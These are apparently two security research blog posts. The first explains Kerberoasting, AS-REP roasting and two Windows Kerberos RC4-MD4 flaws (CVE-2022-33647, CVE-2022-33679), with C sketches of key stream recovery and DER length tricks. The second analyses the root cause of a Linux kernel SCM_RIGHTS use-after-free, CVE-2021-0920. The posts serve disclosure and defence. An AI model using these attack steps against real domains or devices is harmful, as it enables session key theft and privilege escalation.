To get appropriate cipher text the attacker can make requests to the KDC and specify the encryption type they need. The most well known attack technique is called Kerberoasting. This technique requests a service ticket for the targeted user and specifies the RC4-HMAC encryption type as their preferred algorithm. If the user has an RC4 key configured then the ticket returned can be encrypted using the RC4-HMAC algorithm. As significant parts of the plain-text are known for the ticket data, the attacker can try to brute force the key from that. 


This technique does require the attacker to have an account on the KDC to make the service ticket request. It also requires that the user account has a configured Service Principal Name (SPN) so that a ticket can be requested. Also, modern versions of Windows Server will try to block this attack by preferring AES keys derived from the service user's password over RC4, even if the attacker only requested RC4 support.


An alternative form is called AS-REP Roasting. Instead of requesting a service ticket this relies on the initial authentication requests to return encrypted data. When a user sends an AS-REQ structure, the KDC can look up the user, generate the TGT and its associated session key then return that information encrypted using the user's RC4-HMAC key. At this point the KDC hasn't verified the client knows the user's key before returning the encrypted data, which allows the attacker to brute force the key without needing to have an account themselves on the KDC.


Fortunately this attack is more rare because Windows's Kerberos implementation requires pre-authentication. For a password based logon the user uses their encryption key to encrypt a timestamp value which is sent to the KDC as part of the AS-REQ. The KDC can decrypt the timestamp, check it's within a small time window and only then return the user's TGT and encrypted session key. This would prevent an attacker getting encrypted data for the brute force attack. 


However, Windows does support a user account flag, "Do not require Kerberos preauthentication". If this flag is enabled on a user the authentication request does not require the encrypted timestamp to be sent and the AS-REP roasting process can continue. This should be an uncommon configuration.


The success of the brute-force attack entirely depends on the password complexity. Typically service user accounts have a long, at least 25 character, randomly generated password which is all but impossible to brute force. Normal users would typically have weaker passwords, but they are less likely to have a configured SPN which would make them targets for Kerberoasting. The system administrator can also mitigate the attack by disabling RC4 entirely across the network, though this is not commonly done for compatibility reasons. A more limited alternative is to add sensitive users to the Protected Users Group, which disables RC4 for them without having to disable it across the entire network.

Windows Kerberos Encryption Implementation

While working on researching Windows Defender Credential Guard (CG) I wanted to understand how Windows actually implements the various Kerberos encryption schemes. The primary goal of CG at least for Kerberos is to protect the user's keys, specifically the ones derived from their password and session keys for the TGT. If I could find a way of using one of the keys with a weak encryption algorithm I hoped to be able to extract the original key removing CG's protection.


The encryption algorithms are all implemented inside the CRYPTDLL.DLL library which is separate from the core Kerberos library in KERBEROS.DLL on the client and KDCSVC.DLL on the server. This interface is undocumented but it's fairly easy to work out how to call the exported functions. For example, to get a "crypto system" from the encryption type integer you can use the following exported function:


NTSTATUS CDLocateCSystem(int etype, KERB_ECRYPT** engine);


The KERB_ECRYPT structure contains configuration information for the engine such as the size of the key and function pointers to convert a password to a key, generate new session keys, and perform encryption or decryption. The structure also contains a textual name so that you can get a quick idea of what the algorithm is supposed to be, which led to the following list of supported systems:


Name                                    Encryption Type

----                                    ---------------

RSADSI RC4-HMAC                         24

RSADSI RC4-HMAC                         23

Kerberos AES256-CTS-HMAC-SHA1-96        18

Kerberos AES128-CTS-HMAC-SHA1-96        17

Kerberos DES-CBC-MD5                    3

Kerberos DES-CBC-CRC                    1

RSADSI RC4-MD4                          -128

Kerberos DES-Plain                      -132

RSADSI RC4-HMAC                         -133

RSADSI RC4                              -134

RSADSI RC4-HMAC                         -135

RSADSI RC4-EXP                          -136

RSADSI RC4                              -140

RSADSI RC4-EXP                          -141

Kerberos AES128-CTS-HMAC-SHA1-96-PLAIN  -148

Kerberos AES256-CTS-HMAC-SHA1-96-PLAIN  -149
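
Incidentally, a table like this can be reproduced from Python via ctypes, relying only on the CDLocateCSystem signature shown above. A rough sketch for Windows, treating any non-zero NTSTATUS as "not supported":

import ctypes

cryptdll = ctypes.WinDLL("cryptdll.dll")

def etype_supported(etype):
    engine = ctypes.c_void_p()    # opaque KERB_ECRYPT* out-pointer
    status = cryptdll.CDLocateCSystem(ctypes.c_int(etype), ctypes.byref(engine))
    return status == 0            # STATUS_SUCCESS

for etype in (24, 23, 18, 17, 3, 1, -128, -132, -133, -134, -135, -136,
              -140, -141, -148, -149):
    print(etype, etype_supported(etype))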


Encryption types with positive values are well-known encryption types defined in the RFCs, whereas negative values are private types. Therefore I decided to spend my time on these private types. Most of the private types were just subtle variations on the existing well-known types, or clones with legacy numbers. 


However, one stood out as being different from the rest, "RSADSI RC4-MD4" with type value -128. This was different because the implementation was incredibly insecure, specifically it had the following properties:


  • Keys are 16 bytes in size, but only the first 8 of the key bytes are used by the encryption algorithm.

  • The key is used as-is, there's no blinding so the key stream is always the same for the same user key.

  • The message type is ignored, which means that the key stream is the same for different parts of the Kerberos protocol when using the same key.

  • The encrypted data does not contain any cryptographic hash to protect from tampering with the ciphertext which for RC4 is basically catastrophic. Even though the name contains MD4 this is only used for deriving the key from the password, not for any message integrity.

  • Generated session keys are 16 bytes in size but only contain 40 bits (5 bytes) of randomness. The remaining 11 bytes are populated with the fixed value of 0xAB.


To say this is bad from a cryptographic standpoint is an understatement. Surely, even though this crypto system is implemented in CRYPTDLL, it wouldn't actually be used by Kerberos? Unfortunately not: it is accepted as a valid encryption type when sent in the AS-REQ to the KDC. The question then becomes how to exploit this behavior.

Exploitation on the Wire (CVE-2022-33647)

My first thought was to attack the session key generation. If we could get the server to return the AS-REP with an RC4-MD4 session key for the TGT, then any subsequent usage of that key could be captured and used to brute force the 40 bit key. At that point we could take the user's TGT (which is sent in the clear) and the session key, and make requests as that authenticated user.


The most obvious approach to forcing the preferred encryption type to be RC4-MD4 would be to interpose the connection between a client and the KDC. The etype field of the AS-REQ is not protected for password based authentication. Therefore a proxy can modify the field to only include RC4-MD4 which is then sent to the KDC. Once that's completed the proxy would need to also capture a service ticket request to get encrypted data to brute force.


Brute forcing the 40 bit key would be technically feasible, at least if you built a giant lookup table, but it didn't seem very practical. I realized there's a simpler way: when a client authenticates, it typically sends a request to the KDC with no pre-authentication timestamp present. As long as pre-authentication hasn't been disabled, the KDC returns a Kerberos error to the client with the KDC_ERR_PREAUTH_REQUIRED error code.


As part of that error response the KDC also sends a list of acceptable encryption types in the PA-ETYPE-INFO2 pre-authentication data structure. This list contains additional information for the password to key derivation such as the salt for AES keys. The client can use this information to correctly generate the encryption key for the user. I noticed that if you sent back only a single entry indicating support for RC4-MD4 then the client would use the insecure algorithm for generating the pre-authentication timestamp. This worked even if the client didn't request RC4-MD4 in the first place.


When the KDC received the timestamp it would validate it using the RC4-MD4 algorithm and return the AS-REP with the TGT's RC4-MD4 session key encrypted using the same key as the timestamp. Due to the already mentioned weaknesses in the RC4-MD4 algorithm the key stream used for the timestamp must be the same as used in the response to encrypt the session key. Therefore we could mount a known-plaintext attack to recover the keystream from the timestamp and use that to decrypt parts of the response.


Diagram showing the attack process. A computer with a kerberos client sends an AS-REQ to the attacker, which returns an error requesting pre-authentication and selecting RC4-MD4 encryption. The client then converts the user's password into an RC4-MD4 key which is used to encrypt the timestamp to send to the KDC. This is used to validate the user authentication and an AS-REP is returned with a TGT session key generated for RC4-MD4.

The timestamp itself has the following ASN.1 structure, which is serialized using the Distinguished Encoding Rules (DER) and then encrypted.


PA-ENC-TS-ENC           ::= SEQUENCE {

     patimestamp     [0] KerberosTime -- client's time --,

     pausec          [1] Microseconds OPTIONAL

}


The AS-REP encrypted response has the following ASN.1 structure:


EncASRepPart  ::= SEQUENCE {

     key             [0] EncryptionKey,

     last-req        [1] LastReq,

     nonce           [2] UInt32,

     key-expiration  [3] KerberosTime OPTIONAL,

     flags           [4] TicketFlags,

     authtime        [5] KerberosTime,

     starttime       [6] KerberosTime OPTIONAL,

     endtime         [7] KerberosTime,

     renew-till      [8] KerberosTime OPTIONAL,

     srealm          [9] Realm,

     sname           [10] PrincipalName,

     caddr           [11] HostAddresses OPTIONAL

}


We can see from the two structures that, as luck would have it, the session key in the AS-REP is at the start of the encrypted data. This means there should be an overlap between the known parts of the timestamp and the key, allowing us to apply key stream recovery to decrypt the session key without any brute force needed.


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the timestamp with the 40 bit session key in the AS-REP.

The diagram shows the ASN.1 DER structures for the timestamp and the start of the AS-REP. The values with specific hex digits in green are plain text we know or can calculate, as they are part of the ASN.1 structure, such as types and lengths. We can see that there's a clear overlap between 4 bytes of known data in the timestamp and the first 4 bytes of the session key. We only need the first 5 bytes of the key due to the padding at the end, but this does mean we need to brute force the final key byte.


We can do this brute force in one of two ways. First, we can send service ticket requests with the user's TGT and a guess for the session key to the KDC until one succeeds. This would require at most 256 requests to the KDC. Alternatively, we can capture a service ticket request from the client, which is likely to happen immediately after the authentication. As the service ticket request will be encrypted using the session key, we can perform the brute force attack locally without needing to talk to the KDC, which will be faster. Regardless of the option chosen, this approach is orders of magnitude faster than brute forcing the entire 40 bit session key.
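Putting the pieces together, here's a rough sketch of the recovery logic; the buffers, the KEY_OFFSET value and the try_session_key helper are illustrative placeholders rather than the exact DER layouts:

#include <stdio.h>

// Hypothetical offset where the known timestamp bytes overlap the session
// key; in reality this comes from the DER layouts shown in the diagrams.
#define KEY_OFFSET 8

int main(void) {
    unsigned char ts_ct[32]    = {0};  // captured encrypted timestamp
    unsigned char ts_known[32] = {0};  // known/calculated timestamp plain text
    unsigned char rep_ct[32]   = {0};  // captured encrypted AS-REP part
    unsigned char session_key[5];

    // RC4-MD4 reuses the same key stream for both messages, so:
    //   keystream[i] = ts_ct[i] ^ ts_known[i]
    //   plaintext[i] = rep_ct[i] ^ keystream[i]
    for (int i = 0; i < 4; i++) {
        unsigned char ks = ts_ct[KEY_OFFSET + i] ^ ts_known[KEY_OFFSET + i];
        session_key[i] = rep_ct[KEY_OFFSET + i] ^ ks;
    }
    // No known plain text overlaps the 5th key byte, so brute force it,
    // e.g. against a captured service ticket request (hypothetical helper):
    for (int guess = 0; guess < 256; guess++) {
        session_key[4] = (unsigned char)guess;
        // if (try_session_key(session_key)) break;
    }
    return 0;
}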


The simplest approach to performing this exploit would be to interpose the client to server connection and modify traffic. However, as the initial request without pre-authentication just returns an error message, it's likely the exploit could be done by injecting a response back to the client while the KDC is processing the real request. This could be done with only the ability to monitor network traffic and inject arbitrary network traffic back into that network. That said, I've not verified that approach.

Exploitation without Interception (CVE-2022-33679)

The requirement to have access to the client-to-server authentication traffic does make this vulnerability seem less impactful, although there are plenty of scenarios where an attacker could interpose: shared Wi-Fi networks, for example, or physical attacks which could compromise the computer account authentication that takes place when a domain-joined system boots.


It would be interesting if there was an attack vector to exploit this without needing a real Kerberos user authenticating at all. I realized that if a user has pre-authentication disabled then we have everything we need to perform the attack. The important point is that if pre-authentication is disabled we can request a TGT for the user, specifying RC4-MD4 encryption, and the KDC will send back the AS-REP encrypted using that algorithm.


The key to the exploit is to reverse the previous attack: instead of using the timestamp to decrypt the AS-REP, we'll use the AS-REP to encrypt a timestamp. We can then use the timestamp value, when sent to the KDC, as an encryption oracle to brute force enough bytes of the key stream to decrypt the TGT's session key. For example, if we remove the optional microseconds component of the timestamp we get the following DER encoded values:


Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between known bytes in the AS-REP and the timestamp string which can be used to generate a valid encrypted timestamp.

The diagram shows that currently there's no overlap between the timestamp, represented by the T bytes, and the 40 bit session key. However, we know, or at least can calculate, the entire DER encoded data for the AS-REP covering the entire timestamp buffer. We can use this to calculate the key stream for the user's RC4-MD4 key without actually knowing the key itself. With the key stream we can encrypt a valid timestamp and send it to the KDC.


If the KDC responds with a valid AS-REP then we know we've correctly calculated the key stream. How can we use this to start decrypting the session key? The KerberosTime value used for the timestamp is an ASCII string of the form YYYYMMDDHHmmssZ. The KDC parses this string to a format suitable for processing by the server. The parser takes the time as a NUL terminated string, so we can add an additional NUL character to the end of the string and it shouldn't affect the parsing. Therefore we can change the timestamp to the following:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the first byte of the 40 bit session key.


We can now guess a value for the encrypted NUL character and send the new timestamp to the KDC. If the KDC returns an error we know that the parsing failed as it didn't decrypt to a NUL character. However, if the authentication succeeds the value we guessed is the next byte in the key stream and we can decrypt the first byte of the session key.


At this point we've got a problem: we can't just add another NUL character, as the parser would stop on the first one we sent. Even if the value didn't decrypt to a NUL it wouldn't be possible to detect. This is when a second trick comes into play: instead of extending the string, we can abuse the way value lengths are encoded in DER. A length can be in one of two forms: a short form if the length is less than 128, or a long form for everything else.


For the short form the length is encoded in a single byte. For the long form, the first byte has the top bit set to 1, and the lower 7 bits encode the number of trailing bytes of the length value in big-endian format. For example in the above diagram the timestamp's total size is 0x14 bytes which is stored in the short form. We can instead encode the length in an arbitrary sized long form, for example 0x81 0x14, 0x82 0x00 0x14, 0x83 0x00 0x00 0x14 etc. The examples shown below move the NUL character to brute force the next two bytes of the session key:



Diagram showing ASN.1 DER structures for the timestamp and encrypted AS-REP part. It shows extending the first length field so there is an overlap between a final NUL character at the end of the timestamp string which overlaps with the second and third bytes of the 40 bit session key.

Even though DER technically requires the shortest form necessary to encode the length, the Microsoft ASN.1 library doesn't enforce that when parsing, so we can just repeat this length encoding trick to cover the remaining 4 unknown bytes of the key. As the exploit brute forces one byte at a time, the maximum number of requests we'd need to send to the KDC is 5 × 2⁸ = 1280, as opposed to 2⁴⁰ which would be around 1 trillion.
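Here's a minimal sketch of generating those progressively longer long-form length encodings:

#include <stdio.h>

// Encode a DER length using the long form with exactly n length bytes,
// padding with leading zeros. E.g. n=2 encodes 0x14 as 82 00 14.
static size_t encode_long_form_length(unsigned char *out, unsigned len, int n) {
    out[0] = (unsigned char)(0x80 | n);  // top bit set, low bits = byte count
    for (int i = 0; i < n; i++)
        out[1 + i] = (unsigned char)(len >> (8 * (n - 1 - i)));  // big-endian
    return 1 + (size_t)n;
}

int main(void) {
    unsigned char buf[8];
    // Prints: 81 14 / 82 00 14 / 83 00 00 14 - all encoding the length 0x14.
    for (int n = 1; n <= 3; n++) {
        size_t sz = encode_long_form_length(buf, 0x14, n);
        for (size_t i = 0; i < sz; i++) printf("%02x ", buf[i]);
        printf("\n");
    }
    return 0;
}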


Even with such a small number of requests it can still take around 30 seconds to brute force the key, but that still makes it a practical attack. It would be very noisy on the network and you'd expect any competent EDR system to notice, but by then it might be too late.

The Fixes

The only fix I can find is in the KDC service for the domain controller. Microsoft has added a new flag which by default disables the RC4-MD4 algorithm and an old variant of RC4-HMAC with the encryption type of -133. This behavior can be re-enabled by setting the KDC configuration registry value AllowOldNt4Crypto. The reference to NT4 is a good indication of how long this vulnerability has existed, as it presumably pre-dates the introduction of Kerberos in Windows 2000. There are probably some changes to the client as well, but I couldn't immediately find them and it's not really worth my time to reverse engineer it.


It'd be good to mitigate the risk of similar attacks before they're found. Disabling RC4 is definitely recommended, although that can bring its own problems. If this particular vulnerability were being exploited in the wild it should be pretty easy to detect: unusual Kerberos encryption types would be an immediate red flag, as would the repeated login attempts.


Another option is to enforce Kerberos Armoring (FAST) on all clients and KDCs in the environment. This would make it more difficult to inspect and tamper with Kerberos authentication traffic. However, it's not a panacea: for example, for FAST to work the domain-joined computer needs to first authenticate without FAST to get a key it can then use for protecting the communications. If that initial authentication is compromised, the entire protection fails.


The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

10 August 2022 at 23:00

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego developed an exploit for a Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020 (based on the earliest captured sample) until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update.

Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously. The Google Android Security Team performed the full deep-dive analysis of the exploit.

This issue was initially discovered in 2016 by a RedHat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021.

Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read / write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them.

Text extracted from captured samples dubbed the vulnerability “quantum Linux kernel garbage collection”, which appears to be a fitting title for this blogpost.

Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we’ll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

What is SCM_RIGHTS?

Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the “queued” state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. This LWN article does a great job of explaining SCM_RIGHTS reference counting and this “queued” state, and it's recommended reading before continuing on with this blogpost.
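As a concrete userspace illustration, here's a minimal sketch of the sending side:

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

// Send the file descriptor fd_to_send over the connected unix socket sock.
static int send_fd(int sock, int fd_to_send) {
    char dummy = '*';
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    char cmsg_buf[CMSG_SPACE(sizeof(int))];
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cmsg_buf, .msg_controllen = sizeof(cmsg_buf),
    };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;               // we're passing an fd
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));
    // On success the kernel takes its own reference to the underlying file.
    return (int)sendmsg(sock, &msg, 0);
}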

Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we’ll start from the sender’s point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed.

struct scm_fp_list {

        short                   count;

        short                   max;

        struct user_struct      *user;

        struct file             *fp[SCM_MAX_FD];

};

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.

struct scm_cookie {

        struct pid              *pid;           /* Skb credentials */

        struct scm_fp_list      *fp;            /* Passed files         */

        struct scm_creds        creds;          /* Skb credentials      */

#ifdef CONFIG_SECURITY_NETWORK

        u32                     secid;          /* Passed security ID   */

#endif

};

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from the userspace and initializes scm_cookie->fp which can contain SCM_MAX_FD file structures.

Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

/*

 * Need to duplicate file references for the sake of garbage

 * collection.  Otherwise a socket in the fps might become a

 * candidate for GC while the skb is not yet queued.

 */

UNIXCB(skb).fp = scm_fp_dup(scm->fp);

if (!UNIXCB(skb).fp)

        return -ENOMEM;

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that’s being passed so the file is still valid even after the sender closes the transmitted file descriptor later:

struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)

{

        struct scm_fp_list *new_fpl;

        int i;

        if (!fpl)

                return NULL;

        new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),

                          GFP_KERNEL);

        if (new_fpl) {

                for (i = 0; i < fpl->count; i++)

                        get_file(fpl->fp[i]);

                new_fpl->max = new_fpl->count;

                new_fpl->user = get_uid(fpl->user);

        }

        return new_fpl;

}

Let’s examine a concrete example. Assume we have sockets A and B. Socket A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to B’s sk_receive_queue, which stores received datagrams:

unix_stream_sendmsg creates an sk_buff which contains the scm_fp_list structure. The scm_fp_list has an fp pointer that points to the transmitted file (A). The sk_buff is appended to the receiver's queue and the reference count of A is 2.

sk_buff carries scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.

Receiving

Now, let’s take a look at the receiver side unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from skb and clear the skb from sk_receive_queue:

/* Mark read part of skb as used */

if (!(flags & MSG_PEEK)) {

        UNIXCB(skb).consumed += chunk;

        sk_peek_offset_bwd(sk, chunk);

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        if (unix_skb_len(skb))

                break;

        skb_unlink(skb, &sk->sk_receive_queue);

        consume_skb(skb);

        if (scm.fp)

                break;

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;

     i++, cmfptr++)

{

        struct socket *sock;

        int new_fd;

        err = security_file_receive(fp[i]);

        if (err)

                break;

        err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags

                                  ? O_CLOEXEC : 0);

        if (err < 0)

                break;

        new_fd = err;

        err = put_user(new_fd, cmfptr);

        if (err) {

                put_unused_fd(new_fd);

                break;

        }

        /* Bump the usage count and install the file. */

        sock = sock_from_file(fp[i], &err);

        if (sock) {

                sock_update_netprioidx(&sock->sk->sk_cgrp_data);

                sock_update_classid(&sock->sk->sk_cgrp_data);

        }

        fd_install(new_fd, get_file(fp[i]));

}

/*

 * All of the files that fit in the message have had their

 * usage counts incremented, so we just free the list.

 */

__scm_destroy(scm);

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

void __scm_destroy(struct scm_cookie *scm)

{

        struct scm_fp_list *fpl = scm->fp;

        int i;

        if (fpl) {

                scm->fp = NULL;

                for (i=fpl->count-1; i>=0; i--)

                        fput(fpl->fp[i]);

                free_uid(fpl->user);

                kfree(fpl);

        }

}
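For completeness, here's a matching userspace sketch of the receiving side; the flags parameter is where MSG_PEEK, which becomes important later, would be passed:

#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

// Receive a file descriptor passed over the connected unix socket sock.
// Passing MSG_PEEK as flags "peeks" at the message: a new fd is still
// installed, but the skb stays on the receive queue.
static int recv_fd(int sock, int flags) {
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    char cmsg_buf[CMSG_SPACE(sizeof(int))];
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = cmsg_buf, .msg_controllen = sizeof(cmsg_buf),
    };
    if (recvmsg(sock, &msg, flags) < 0)
        return -1;
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(fd));
    return fd;   // the newly installed file descriptor
}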

Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented. Once the recipient socket has accepted and installed the passed file descriptor, the reference count is then decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed the file descriptor.

Let’s consider the following scenario:

  1. The process creates sockets A and B.
  2. A sends socket A to socket B.
  3. B sends socket B to socket A.
  4. Close A.
  5. Close B.

Socket A and B form a reference count cycle.

Scenario for reference count cycle

Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented because they were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed. The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage. Each time the reference count is increased due to an SCM_RIGHTS datagram being sent, the inflight count will also be incremented.
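To make the scenario concrete, here's a minimal userspace sketch that constructs the cycle, reusing the send_fd helper sketched earlier:

#include <unistd.h>
#include <sys/socket.h>

// Assumes the send_fd helper from the earlier sketch.
int main(void) {
    int sv[2];
    // A = sv[0], B = sv[1]: a connected unix domain socket pair.
    socketpair(AF_UNIX, SOCK_STREAM, 0, sv);
    send_fd(sv[0], sv[0]);  // A sends itself; queued in B's receive queue
    send_fd(sv[1], sv[1]);  // B sends itself; queued in A's receive queue
    close(sv[0]);           // Close A
    close(sv[1]);           // Close B: only the queued skbs now reference A and B
    return 0;
}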

When a file descriptor is sent by SCM_RIGHTS datagram, the Linux kernel puts its unix_sock into a global list gc_inflight_list. The kernel increments unix_tot_inflight which counts the total number of inflight sockets. Then, the kernel increments u->inflight which tracks the inflight count for each individual file descriptor in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

void unix_inflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                if (atomic_long_inc_return(&u->inflight) == 1) {

                        BUG_ON(!list_empty(&u->link));

                        list_add_tail(&u->link, &gc_inflight_list);

                } else {

                        BUG_ON(list_empty(&u->link));

                }

                unix_tot_inflight++;

        }

        user->unix_inflight++;

        spin_unlock(&unix_gc_lock);

}

Thus, here is what the sk_buff looks like when transferring a file descriptor between sockets A and B:

When the file descriptor A sends itself to the file descriptor B, the reference count of the file descriptor A is 2 and the inflight count is 1. For the receiver file descriptor B, the file reference count is 1 and the inflight count is 0.

The inflight count of A is incremented

When the socket file descriptor is received from the other side, the unix_sock.inflight count will be decremented.

Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because either socket can still receive the transmitted file and break the reference cycle:

The file descriptor A sends itself to the file descriptor B and vice versa. The inflight count of the file descriptor A and B is both 1 and the file reference count is both 2.

Breakable cycle before close A and B

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

The cycle becomes unbreakable after closing A and B. The reference count equals to the inflight count for A and B.

Unbreakable cycle after close A and B

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

  1. A sends socket A to socket B.
  2. B sends socket B to socket A.
  3. B sends socket B to socket 𝛼.
  4. 𝛼 sends socket 𝛼 to socket B.
  5. Close A.
  6. Close B.

A, B and alpha form a breakable cycle.

Breakable cycle for A, B and 𝛼

The cycle is breakable, because we can get the newly installed file descriptor B' from the socket file descriptor 𝛼 and the newly installed file descriptor A' from B’.

Garbage Collection

A high level view of garbage collection is available from lwn.net:

"If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles:

  1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list.
  2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
  3. After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left.

Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

list_for_each_entry_safe(u, next, &gc_inflight_list, link) {

        long total_refs;

        long inflight_refs;

        total_refs = file_count(u->sk.sk_socket->file);

        inflight_refs = atomic_long_read(&u->inflight);

        BUG_ON(inflight_refs < 1);

        BUG_ON(total_refs < inflight_refs);

        if (total_refs == inflight_refs) {

                list_move_tail(&u->link, &gc_candidates);

                __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

                __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

        }

}

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

/* Now remove all internal in-flight reference to children of

 * the candidates.

 */

